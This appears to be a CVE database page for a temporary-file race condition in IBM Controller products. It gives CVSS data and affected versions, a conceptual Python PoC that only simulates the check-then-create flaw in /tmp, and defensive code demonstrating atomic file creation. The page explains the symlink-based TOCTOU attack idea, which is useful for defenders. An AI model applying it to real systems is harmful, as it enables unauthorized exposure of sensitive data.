Security Vulnerability Report
CVE-2025-33111 CVSS 4.3 MEDIUM

CVE-2025-33111

Published: 2025-12-08 22:15:51
Last Modified: 2025-12-10 18:13:59

Description

IBM Controller 11.1.0 through 11.1.1 and IBM Cognos Controller 11.0.0 through 11.0.1 FP6 is vulnerable to creation of temporary files without atomic operations which may expose sensitive information to an authenticated user due to race condition attacks.

CVSS Details

CVSS Score: 4.3
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:ibm:cognos_controller:*:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:ibm:controller:*:*:*:*:*:*:*:* - VULNERABLE
IBM Controller 11.1.0
IBM Controller 11.1.1
IBM Cognos Controller 11.0.0
IBM Cognos Controller 11.0.1
IBM Cognos Controller 11.0.1 FP6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
#!/usr/bin/env python3
"""
CVE-2025-33111 PoC - IBM Controller Temporary File Race Condition
Note: This is a conceptual demonstration, actual exploitation requires specific conditions.
"""

import os
import time


def simulate_vulnerable_temp_file_creation():
    """
    Simulate the vulnerable temporary file creation pattern found in IBM Controller.
    The vulnerability exists when files are created without atomic operations.
    """
    print("[*] Simulating vulnerable temporary file creation...")

    # Vulnerable pattern: Check existence before creation (TOCTOU)
    temp_path = "/tmp/ibm_controller_temp_file.txt"

    # Race condition window starts here
    if not os.path.exists(temp_path):
        # Window of opportunity for race condition
        time.sleep(0.001)  # Simulating processing delay

        try:
            # Creating file without O_EXCL flag (non-atomic)
            with open(temp_path, 'w') as f:
                f.write("Sensitive data - Controller config")
            print(f"[+] File created at: {temp_path}")
            return temp_path
        except FileExistsError:
            # Unreachable with mode 'w': only an exclusive create (mode 'x' / O_EXCL)
            # raises FileExistsError, which is why this pattern cannot detect the race.
            print("[-] Race condition detected: File already exists")
            return None
    return None


def race_condition_attack(target_path):
    """
    Simulate attacker exploiting the race condition window.
    In real scenario, attacker would create symlink or replace file content.
    """
    print(f"[*] Attacker attempting to exploit race condition at {target_path}")

    # In real attack: Create symlink or inject malicious content
    # This demonstrates the concept only
    if os.path.exists(target_path):
        try:
            # Attempt to read potentially exposed sensitive data
            with open(target_path, 'r') as f:
                content = f.read()
                print(f"[!] Potential sensitive data exposed: {content[:50]}...")
                return True
        except PermissionError:
            print("[-] Permission denied - attack may still succeed with symlink")
    return False


def main():
    print("=" * 60)
    print("CVE-2025-33111 - IBM Controller Race Condition PoC")
    print("=" * 60)

    # Simulate vulnerable application behavior
    temp_file = simulate_vulnerable_temp_file_creation()

    if temp_file:
        # Clean up for demo
        if os.path.exists(temp_file):
            os.remove(temp_file)

    print("\n[*] Note: This PoC demonstrates the vulnerability concept.")
    print("[*] Actual exploitation requires authenticated access to IBM Controller.")
    print("[*] Mitigations:")
    print("    1. Use atomic file operations (mkstemp, O_EXCL)")
    print("    2. Set restrictive file permissions")
    print("    3. Apply IBM security patches")


if __name__ == "__main__":
    main()
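The first two mitigations the PoC lists (atomic creation with O_EXCL or mkstemp, restrictive permissions), shown beside the check-then-create pattern. This is an added example, not code from the original page or from IBM; it assumes a POSIX system, and the file names are hypothetical and live only in a scratch directory.

```python
import os
import shutil
import stat
import tempfile


def create_exclusive(path, data, mode=0o600):
    """Create path atomically; refuse any existing file or symlink at that name."""
    # O_CREAT|O_EXCL makes "check and create" a single kernel operation (no TOCTOU gap).
    fd = os.open(path, os.O_WRONLY | os.O_CREAT | os.O_EXCL, mode)
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return path


def create_private_temp(data, directory=None):
    """Preferred form: mkstemp picks an unpredictable name, uses O_EXCL and mode 0600."""
    fd, path = tempfile.mkstemp(prefix="ctrl_", dir=directory)
    with os.fdopen(fd, "w") as f:
        f.write(data)
    return path


def demo():
    """Run both patterns against a name that is already taken by a symlink."""
    workdir = tempfile.mkdtemp()                                # constructed scratch dir
    fixed = os.path.join(workdir, "controller_temp_file.txt")   # hypothetical fixed name
    decoy = os.path.join(workdir, "other_file.txt")             # hypothetical link target
    results = {}
    try:
        os.symlink(decoy, fixed)              # constructed: the name exists as a dangling link
        # Check-then-create: exists() follows the link, so the name looks free.
        if not os.path.exists(fixed):
            with open(fixed, "w") as f:       # mode 'w' follows the link and creates decoy
                f.write("sensitive")
        results["legacy_wrote_through_link"] = os.path.exists(decoy)
        os.remove(decoy)
        # Exclusive create: the kernel rejects the name because the link occupies it.
        try:
            create_exclusive(fixed, "sensitive")
            results["exclusive_refused_link"] = False
        except FileExistsError:
            results["exclusive_refused_link"] = True
        results["decoy_untouched"] = not os.path.exists(decoy)
        private = create_private_temp("sensitive", directory=workdir)
        results["private_mode"] = stat.S_IMODE(os.stat(private).st_mode)
        results["private_is_regular"] = stat.S_ISREG(os.lstat(private).st_mode)
    finally:
        shutil.rmtree(workdir)
    return results
```
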

References

https://www.ibm.com/support/pages/node/7253273 (Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-33111", "sourceIdentifier": "[email protected]", "published": "2025-12-08T22:15:51.150", "lastModified": "2025-12-10T18:13:59.027", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "IBM Controller 11.1.0 through 11.1.1 and IBM Cognos Controller 11.0.0 through 11.0.1 FP6 is vulnerable to creation of temporary files without atomic operations which may expose sensitive information to an authenticated user due to race condition attacks."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "baseScore": 4.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-379"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:ibm:cognos_controller:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.0.0", "versionEndExcluding": "11.0.1.7", "matchCriteriaId": "010915B1-A0E9-4D01-8A86-3B771F2AD659"}, {"vulnerable": true, "criteria": "cpe:2.3:a:ibm:controller:*:*:*:*:*:*:*:*", "versionStartIncluding": "11.1.0", "versionEndExcluding": "11.1.2", "matchCriteriaId": "24C24CEC-8494-4620-9F14-22D154D85866"}]}]}], "references": [{"url": "https://www.ibm.com/support/pages/node/7253273", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}